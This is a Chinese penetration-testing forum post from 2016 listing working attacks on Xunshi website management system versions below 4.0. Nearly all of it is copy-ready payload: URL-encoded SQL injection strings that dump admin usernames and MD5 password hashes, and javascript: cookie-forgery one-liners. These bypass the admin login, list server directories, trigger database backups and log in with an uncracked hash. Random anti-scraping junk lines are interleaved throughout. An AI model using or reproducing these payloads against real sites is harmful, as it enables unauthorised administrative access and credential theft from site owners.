中国网络渗透测试联盟
标题:
讯时网站管理系统4.0以下漏洞
[打印本页]
作者:
admin
时间:
2016-5-11 14:55
标题:
讯时网站管理系统4.0以下漏洞
一、注入
$ ?$ P6 P9 S3 O& y; d+ L c( [2 ^
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
! t% N7 ~& v' _/ n# [) S7 f
& e: e5 G: U( H
2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
9 e: Z4 V$ Q3 f% b
第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
6 s0 X* L. G0 `# z# \
可得到用户名和MD5加密码的密码。
[, G1 ~/ Z/ e$ ^9 |' q$ d0 o- w
5 X% y9 v! U2 C0 ?0 i+ _0 b
二、cookies欺骗
: z) v8 s$ n/ i. @
0 W$ f' n3 x8 C. V
1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞.
9 `6 ?; t1 }, _( e" ?
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
7 I: G( e: V3 a' I& e. K: [
. ]# Q& c* t1 b, _ B _4 p
2、列目录.
W1 ]0 d' {7 Z$ Y/ {+ I
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."
- Y2 k& y" Q$ n7 G; B
3 l- J) j' A, d; E. x8 p7 Z
3、数据库备份(适用性好像比较低.)
; S3 W |3 Q" C8 R; ~
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
. }5 ]; d( n2 O6 d
8 S. I4 \( F; ]
4、得到MD5密码解不了密进后台方法
9 g9 R; H7 X' L) B0 M9 p
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
8 y- o3 u$ X9 H1 l5 {
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2